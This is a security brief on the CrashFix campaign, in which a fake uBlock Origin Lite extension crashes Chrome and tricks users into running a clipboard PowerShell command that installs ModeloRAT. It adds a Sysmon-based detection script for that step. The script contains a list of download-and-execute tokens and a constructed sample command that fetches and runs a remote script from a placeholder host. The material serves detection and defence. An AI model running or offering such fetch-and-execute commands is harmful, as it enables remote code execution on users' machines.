What happened
The CrashFix campaign uses a malicious browser extension to deploy ModeloRAT. Huntress analysts identified the threat actor KongTuke distributing a deceptive extension named NexShield that impersonates the legitimate uBlock Origin Lite ad blocker and was hosted on the official Chrome Web Store. After a delay, the extension deliberately crashes the user's browser by exhausting resources through Chrome runtime port loops. On restart it displays a fake "CrashFix" warning that urges the user to apply an apparent remedy through the Windows Run dialog, having silently copied a malicious PowerShell command to the clipboard. If the user pastes and runs it, the command uses a Windows utility to download further payloads. On domain-joined machines the chain ends with the deployment of ModeloRAT, a Python-based remote access trojan with encrypted command-and-control. The infection is multi-stage and relies on social engineering plus abuse of legitimate platform features (the Web Store, the clipboard, the Run dialog and PowerShell) rather than on a browser exploit.
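The stage that defenders can observe most reliably is the user pasting the clipboard command into the Run dialog: PowerShell is then spawned by explorer.exe (the Run dialog's host) rather than by a terminal, script host or management agent, with a command line that fetches something from the network. The following added example, written for this brief and not taken from the Huntress report, scores Sysmon process-creation (Event ID 1) records on exactly that pattern. The token list is a generic heuristic, not indicators published for CrashFix; the sample events are constructed; the live query assumes Sysmon is installed with process-creation logging enabled.

```powershell
# Added example (not from the Huntress report): flag the Run-dialog -> PowerShell
# stage of the CrashFix chain in Sysmon Event ID 1 (process creation) data.
# Assumptions: field names follow Sysmon's EventData (Image, ParentImage,
# CommandLine, User); the token list is a heuristic, not campaign indicators.

# Lower-case substrings that commonly appear when an interactive PowerShell
# launch is used to fetch and run a remote payload.
$SuspiciousTokens = @(
    '-w hidden', '-windowstyle hidden', '-nop', '-noprofile', '-enc', '-encodedcommand',
    'iwr ', 'invoke-webrequest', 'downloadstring', 'downloadfile',
    'http://', 'https://', 'iex ', 'invoke-expression'
)

function Test-RunDialogPowerShell {
    param(
        [string] $Image       = '',
        [string] $ParentImage = '',
        [string] $CommandLine = ''
    )
    # The Run dialog is hosted by explorer.exe, so PowerShell started from it
    # has explorer.exe as its parent. Legitimate admin use normally comes from
    # cmd.exe, a terminal, a scheduled task or an RMM/EDR agent instead.
    $isPowerShell = $Image -match '\\(powershell|pwsh)\.exe$'
    $fromExplorer = $ParentImage -match '\\explorer\.exe$'
    $cl   = $CommandLine.ToLowerInvariant()
    $hits = @($SuspiciousTokens | Where-Object { $cl.Contains($_) })
    [pscustomobject]@{
        Suspicious = ($isPowerShell -and $fromExplorer -and $hits.Count -gt 0)
        Tokens     = $hits
    }
}

function Find-RunDialogPowerShell {
    # Live version: scan the last N hours of Sysmon process-creation events.
    param([int] $Hours = 24)
    $filter = @{
        LogName   = 'Microsoft-Windows-Sysmon/Operational'
        Id        = 1
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction Stop | ForEach-Object {
        # Flatten the EventData <Data Name="..."> elements into a hashtable.
        $d = @{}
        ([xml]$_.ToXml()).Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
        $r = Test-RunDialogPowerShell -Image $d.Image -ParentImage $d.ParentImage -CommandLine $d.CommandLine
        if ($r.Suspicious) {
            [pscustomobject]@{
                Time        = $_.TimeCreated
                User        = $d.User
                Tokens      = ($r.Tokens -join ',')
                CommandLine = $d.CommandLine
            }
        }
    }
}

# Constructed sample events (not real telemetry) to exercise the check offline.
$SampleEvents = @(
    @{ Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       ParentImage = 'C:\Windows\explorer.exe'
       CommandLine = 'powershell -w hidden -nop -c "iwr https://example.invalid/fix.ps1 | iex"' },
    @{ Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       ParentImage = 'C:\Windows\System32\cmd.exe'
       CommandLine = 'powershell -File C:\scripts\backup.ps1' },
    @{ Image       = 'C:\Windows\System32\notepad.exe'
       ParentImage = 'C:\Windows\explorer.exe'
       CommandLine = 'notepad.exe' }
)
foreach ($e in $SampleEvents) {
    $r = Test-RunDialogPowerShell @e
    '{0,-5} {1}' -f $r.Suspicious, $e.CommandLine
}
```

Only the first sample event is flagged: it is PowerShell, its parent is explorer.exe, and the command line carries hidden-window and download tokens. The second is PowerShell with a download-free command line from cmd.exe, and the third is not PowerShell at all. On a real estate, run `Find-RunDialogPowerShell -Hours 48` on hosts of interest, or port the same three conditions into the SIEM rule language in use; the parent-process condition is what keeps the rule quiet on administrator and automation traffic.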
Who is affected
Google Chrome users who installed the deceptive extension are directly exposed. Corporate users on domain-joined systems are at greatest risk, since the full malware payload is delivered only on such machines. Organizations without extension allowlists or with unmanaged endpoint controls face elevated risk.
Why CISOs should care
Malicious browser extensions can circumvent traditional network defenses and leverage social engineering to deliver backdoors. When integrated with corporate environments, they provide footholds for broader compromise and persistent access.
3 practical actions
- Enforce extension allowlists: Restrict browser extension installs to approved listings only.
- Educate users on extensions: Train users to avoid installing extensions from ads or sponsored links.
- Monitor execution anomalies: Detect unusual PowerShell activity or abnormal extension behaviors.
